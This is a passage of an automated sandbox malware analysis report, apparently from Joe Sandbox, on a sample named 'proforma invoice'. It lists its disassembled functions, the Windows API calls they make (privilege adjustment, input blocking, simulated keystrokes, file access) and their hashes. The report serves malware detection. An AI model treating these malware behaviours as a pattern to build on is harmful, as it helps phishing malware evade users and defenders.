                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: InputSendkeybd_event
                  • String ID:
                  • API String ID: 3536248340-0
                  • Opcode ID: e896179e57b67fd87225983cc2632e5b28ded55df5ed3c5db04bcc94c1885c29
                  • Instruction ID: fcb10bcb7c60e240f6ab8c3e2d108fe24756976ca04397e1a57447000f59bf53
                  • Opcode Fuzzy Hash: e896179e57b67fd87225983cc2632e5b28ded55df5ed3c5db04bcc94c1885c29
                  • Instruction Fuzzy Hash: 03F0177180428EABDB059FA0C806BAE7FB4FF08309F10804AF965A61A2C77986119F94
                  Function 00B010BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                  Download Yara Rule
                  APIs
                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B011FC), ref: 00B010D4
                  • CloseHandle.KERNEL32(?,?,00B011FC), ref: 00B010E9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AdjustCloseHandlePrivilegesToken
                  • String ID:
                  • API String ID: 81990902-0
                  • Opcode ID: d36954a637f52226b82fff8f674233b376ca8c8ff6290242366b815373486b09
                  • Instruction ID: 3b90e3b907561630e951299e25bda765a834127c15f53cc79ab7a473dc7b46e1
                  • Opcode Fuzzy Hash: d36954a637f52226b82fff8f674233b376ca8c8ff6290242366b815373486b09
                  • Instruction Fuzzy Hash: 42E0BF72014610AEE7252B55FD05EB77BEDEB04310B24882DF5A6914B1DB62ACA0DB54
                  Function 00AACAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                  Download Yara Rule
                  Strings
                  • Variable is not of type 'Object'., xrefs: 00AF0C40
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: Variable is not of type 'Object'.
                  • API String ID: 0-1840281001
                  • Opcode ID: 899c02beef7ed873833730b44396ba043d6b928b8a0bb17c2edf46227828463e
                  • Instruction ID: f38e47a72dbde2f2bf285030c87c474d4a73c0b1765a355ae8785c4dc8e50769
                  • Opcode Fuzzy Hash: 899c02beef7ed873833730b44396ba043d6b928b8a0bb17c2edf46227828463e
                  • Instruction Fuzzy Hash: EE327A70900218DFEF14DF94C985EFDB7B5BF06324F148069E906AB292DB75AE46CB60
                  Function 00AD676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00AD6766,?,?,00000008,?,?,00ADFEFE,00000000), ref: 00AD6998
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  • Opcode ID: b0bd1e54d2e403f2a6a8669942e1ac91b47d9fa12aead09639baf1b389947677
                  • Instruction ID: 0aed528b5213d842346f212ceba7c245a8b4df843c77308b55a39fa384f21c82
                  • Opcode Fuzzy Hash: b0bd1e54d2e403f2a6a8669942e1ac91b47d9fa12aead09639baf1b389947677
                  • Instruction Fuzzy Hash: 17B129316106099FD715CF28C48AB697BB0FF45364F29865AE8DACF3A2C735E991CB40
                  Function 00ABB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: c3bf79ff41f3b4ca8ef7ec5f09283dfc4a10a0523a3a396755799034ac8a855f
                  • Instruction ID: d8e2d599b95d74817103b0048616e3944647852b8aadf08cbf42194dd773e1a4
                  • Opcode Fuzzy Hash: c3bf79ff41f3b4ca8ef7ec5f09283dfc4a10a0523a3a396755799034ac8a855f
                  • Instruction Fuzzy Hash: 561251759102299FCB14CF98C8806FEB7F5FF48710F14819AE949EB256DB749E81CBA0
                  Function 00B1EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                  Download Yara Rule
                  APIs
                  • BlockInput.USER32(00000001), ref: 00B1EABD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: BlockInput
                  • String ID:
                  • API String ID: 3456056419-0
                  • Opcode ID: 2ae5324069f7a68d6bfc54776e0a58100bd9d05cec60c12a809bf2c7d570e214
                  • Instruction ID: c9f304aecbc53b01249350fb6f01c32488d1837486d07ea01fbe0cd6926616d9
                  • Opcode Fuzzy Hash: 2ae5324069f7a68d6bfc54776e0a58100bd9d05cec60c12a809bf2c7d570e214
                  • Instruction Fuzzy Hash: 0EE04F322102049FD710EF69D945E9AFBE9EF99770F008456FC4AD7391DB70E8808BA1
                  Function 00AC09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                  Download Yara Rule
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00AC03EE), ref: 00AC09DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 7f47eed4f86214b17010b2722a270a8484b0cf114c6054f91d77442311777efd
                  • Instruction ID: 2467ba74e956f7be3c5dcd0eecef91dac22e5fe32f01aebf6ebefd277a7adab4
                  • Opcode Fuzzy Hash: 7f47eed4f86214b17010b2722a270a8484b0cf114c6054f91d77442311777efd
                  • Instruction Fuzzy Hash:
                  Function 00AC781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: 0
                  • API String ID: 0-4108050209
                  • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                  • Instruction ID: 8972f152be45c61aa52b66aec86a96c8f5cc4be620c2144e38b20412ab91f621
                  • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                  • Instruction Fuzzy Hash: 4851AD7160C7059BDF788778895DFBE27E99B12340F1B050DEA82DB282CA25DE81DF52
                  Function 00AD6DD9 Relevance: .6, Instructions: 637COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 42233e93606714ed3d318d226849d52b8a472c666fec1bfa63c9b8c13a8a5917
                  • Instruction ID: 33803a092f87fb275f982d9b2c6be3054c9d6cc0bc272f0dde0b179dc00133d3
                  • Opcode Fuzzy Hash: 42233e93606714ed3d318d226849d52b8a472c666fec1bfa63c9b8c13a8a5917
                  • Instruction Fuzzy Hash: EA324326D69F014DD7279634DC22339A249AFB73C5F15C737F81AB6AA6EF28C5835100
                  Function 00ABCC39 Relevance: .6, Instructions: 635COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2754ffaa6b69e99852e27258e570bdd1e47c43b67c5df65915052cec8014b42c
                  • Instruction ID: a075e16cd9c5d5f8c0887f96197236b13674c342f6063d979a9a0ac2312e6767
                  • Opcode Fuzzy Hash: 2754ffaa6b69e99852e27258e570bdd1e47c43b67c5df65915052cec8014b42c
                  • Instruction Fuzzy Hash: E4323C31A0411D8BDF28CFAAC690ABD7BB1EB45370F288566F649CB292D734DD81DB40
                  Function 00AA7920 Relevance: .6, Instructions: 563COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 38fe36512b86e4ae9a1eb6e28bbc57e3251360d23252b98774c88706e3910dd1
                  • Instruction ID: f71003375893c1b7caee409d654076982377c69079cfbdaad3b4f76a588edea6
                  • Opcode Fuzzy Hash: 38fe36512b86e4ae9a1eb6e28bbc57e3251360d23252b98774c88706e3910dd1
                  • Instruction Fuzzy Hash: E022A0B0E0060ADFDF14CF65D981AAEB3F6FF45304F244529E816AB291EB369D11CB60
                  Function 00AA91C0 Relevance: .5, Instructions: 475COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc0eadceb6bbf8cd1b629358cdbc38e471137db5d57a33e51a670557019e4216
                  • Instruction ID: a4e40991ca22b1698ba36d7b5840ccd8dbbce601f56755db6cbe037bebaa7c66
                  • Opcode Fuzzy Hash: cc0eadceb6bbf8cd1b629358cdbc38e471137db5d57a33e51a670557019e4216
                  • Instruction Fuzzy Hash: BD02C5B0A00205EFDF04DF65D981AAEB7B5FF44340F218169E8169B2D1EB35EE24CB95
                  Function 00AD9EEE Relevance: .3, Instructions: 294COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0703f7edccd66ef27660bf18758ecccb2c4f1ee11f48f5454137905d50242876
                  • Instruction ID: 51015c9e65fa8cb4831623499bf3c6fe56a0ea2614b809b53c1a3dd79511d15b
                  • Opcode Fuzzy Hash: 0703f7edccd66ef27660bf18758ecccb2c4f1ee11f48f5454137905d50242876
                  • Instruction Fuzzy Hash: 2DB1F124D2AF404DC2239A398831336B69CBFBB6D5F95D71BFC1675E22EF2286834140
                  Function 00AC1C77 Relevance: .3, Instructions: 254COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                  • Instruction ID: a6ee8a578cef33e0e171f062d61b2d360b6259f9153023e57764519a2527bd21
                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                  • Instruction Fuzzy Hash: AE9156723080A349DB2A473E8574A7DFFE15A533A131B079DE4F3CA1C6FE248965D620
                  Function 00AC19B0 Relevance: .2, Instructions: 240COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                  • Instruction ID: acc6abfc207bba404495ad88bd05dbcc101a928b0300994719212c7bb04a61d9
                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                  • Instruction Fuzzy Hash: 4D9123723090A34ADB2D477A8574A3DFFF15A933A131B079DD4F2CA1C2FE24C9659A20
                  Function 00AC7A4A Relevance: .2, Instructions: 237COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e2c76b0c41f9858548ff1379a24deb75b9e541dd062f70bac1e49622876fcd3e
                  • Instruction ID: 38fd5fdfc0727e576347a373eb51c71f935bb2b9e7c85250f440d9e2b2a1b24f
                  • Opcode Fuzzy Hash: e2c76b0c41f9858548ff1379a24deb75b9e541dd062f70bac1e49622876fcd3e
                  • Instruction Fuzzy Hash: 6061487160C709A7DB349B288E95FBE23A4EF41750F17091EE843DF281DA159E42CF55
                  Function 00AC7CA7 Relevance: .2, Instructions: 237COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 412da774ac2da30e1e18f56cd13e2eac06d4f4277e315c30b244d648a58f8744
                  • Instruction ID: 326aee709f6f0a7f1dfd990c7bc05ca912b552c4d91c0266b77f34a212d8cd88
                  • Opcode Fuzzy Hash: 412da774ac2da30e1e18f56cd13e2eac06d4f4277e315c30b244d648a58f8744
                  • Instruction Fuzzy Hash: 71617A72608709A7DE3A9B284952FBF23A4EF42744F12095EF843DF281DA16AD42CE55
                  Function 00AC1706 Relevance: .2, Instructions: 232COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                  • Instruction ID: 2aea3f8aaddc38ab449ebd68789bac682f960b4ed6272318b38b3f98604d19bf
                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                  • Instruction Fuzzy Hash: 7E81417270D0A349EB69473A8574A3EFFE15A933A131B079DD4F2CA1C2EE24D554E620
                  Function 00ABD064 Relevance: .1, Instructions: 136COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b30bb6936f383ce47abf5590e222f28cf6cf1f94798d2492385fc48ee83b62b3
                  • Instruction ID: 58dda31bb26b502c68ece42344c185203fe9ac2880312ee1c2ab50902b7521c4
                  • Opcode Fuzzy Hash: b30bb6936f383ce47abf5590e222f28cf6cf1f94798d2492385fc48ee83b62b3
                  • Instruction Fuzzy Hash: 4A51289194FBD69FE7039774887A188FF30EC5B51436886CFC8805A88BD791502ADB9A
                  Function 00B12046 Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 766161dc7ba3aa9d6a16737f125325f29b0774b06bd3213b3f953fee747d769b
                  • Instruction ID: 5eecfad6af02ad2e64e8458c01559a4f10156034847f619558fa206cf40d75e1
                  • Opcode Fuzzy Hash: 766161dc7ba3aa9d6a16737f125325f29b0774b06bd3213b3f953fee747d769b
                  • Instruction Fuzzy Hash: D321D5326206118BD728CF79C8226BA73E5E754310F15866EE4A7C73D1DE39A944CB80
                  Function 00B22ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteObject.GDI32(00000000), ref: 00B22B30
                  • DeleteObject.GDI32(00000000), ref: 00B22B43
                  • DestroyWindow.USER32 ref: 00B22B52
                  • GetDesktopWindow.USER32 ref: 00B22B6D
                  • GetWindowRect.USER32(00000000), ref: 00B22B74
                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00B22CA3
                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00B22CB1
                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22CF8
                  • GetClientRect.USER32(00000000,?), ref: 00B22D04
                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B22D40
                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D62
                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D75
